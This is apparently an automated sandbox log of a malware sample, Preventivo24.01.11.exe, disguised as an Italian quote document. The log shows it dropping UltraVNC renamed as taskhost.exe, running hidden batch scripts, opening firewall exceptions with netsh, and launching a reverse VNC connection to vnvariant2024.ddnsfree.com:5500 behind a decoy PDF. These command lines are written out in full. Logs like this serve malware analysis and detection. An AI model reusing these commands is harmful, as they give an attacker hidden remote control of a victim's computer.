Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Games\taskhost.exe Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\upd65B7.tmp
Source: C:\Games\viewer.exe Command line argument: Ae 6_2_00654140
Source: Preventivo24.01.11.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Preventivo24.01.11.exe Virustotal: Detection: 17%
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File read: C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: unknown Process created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: unknown Process created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini
Source: C:\Games\taskhost.exe File opened: C:\Windows\SysWOW64\RICHED32.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Preventivo24.01.11.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Preventivo24.01.11.exe Static file information: File size 5955744 > 1048576
Source: Preventivo24.01.11.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Preventivo24.01.11.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: shi6E82.tmp.0.dr Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_00FC0CA0
Source: Preventivo24.01.11.exe Static PE information: section name: .didat
Source: ddengine.dll.0.dr Static PE information: section name: .SharedD
Source: shi6E82.tmp.0.dr Static PE information: section name: .wpp_sf
Source: shi6E82.tmp.0.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009F6820 pushfd ; iretd 0_3_009F6825
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009F6064 push esp; retf 0_3_009F6069
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009A8900 push ebp; ret 0_3_009A8901
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009AA5B8 push eax; ret 0_3_009AA5BA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009A8DA4 push ecx; ret 0_3_009A8DB1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_00968443 push ds; retf 0_3_00968444
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_00963A48 push ecx; ret 0_3_00963A49
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009683CF push ds; retf 0_3_009683D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009705F3 push 00000078h; retf 0_3_009705F5
